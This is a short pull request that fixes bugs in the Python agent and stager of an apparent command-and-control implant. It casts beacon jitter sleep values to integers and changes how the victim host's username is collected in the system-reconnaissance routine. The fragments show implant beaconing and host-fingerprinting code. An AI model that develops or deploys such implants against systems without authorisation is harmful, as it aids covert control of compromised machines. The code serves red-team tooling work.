### PR TITLE
Convert jitters to int, cross compatibility for obtaining current user

### DIFF
--- a/data/agent/agent.py
+++ b/data/agent/agent.py
@@ -266,8 +266,8 @@ def processPacket(taskingID, data):
             if jitter < 0: jitter = -jitter
             if jitter > 1: jitter = 1/jitter
 
-            minSleep = (1.0-jitter)*delay
-            maxSleep = (1.0+jitter)*delay
+            minSleep = int((1.0-jitter)*delay)
+            maxSleep = int((1.0+jitter)*delay)
             sleepTime = random.randint(minSleep, maxSleep)
             time.sleep(sleepTime)
 
@@ -593,8 +593,8 @@ while(True):
     # sleep for the randomized interval
     if jitter < 0: jitter = -jitter
     if jitter > 1: jitter = 1/jitter
-    minSleep = (1.0-jitter)*delay
-    maxSleep = (1.0+jitter)*delay
+    minSleep = int((1.0-jitter)*delay)
+    maxSleep = int((1.0+jitter)*delay)
 
     sleepTime = random.randint(minSleep, maxSleep)
     time.sleep(sleepTime)

--- a/data/agent/stager.py
+++ b/data/agent/stager.py
@@ -8,6 +8,7 @@ import copy
 import sys
 import struct
 import os
+import pwd
 import hashlib
 import random
 import string
@@ -585,7 +586,8 @@ def post_message(uri, data):
 def get_sysinfo():
 
     # listener | username | high_integrity | hostname | internal_ip | os_details | process_id | py_version
-    username = os.getlogin()
+    #username = os.getlogin()
+    username = pwd.getpwuid(os.getuid())[0] 
 
     uid = os.popen('id -u').read().strip()
     highIntegrity = "True" if (uid == "0") else False


### PR DESCRIPTION
Had a few errors with setting jitter because randrange() expects an int. Also uses a more cross-compatible method for obtaining the current user context.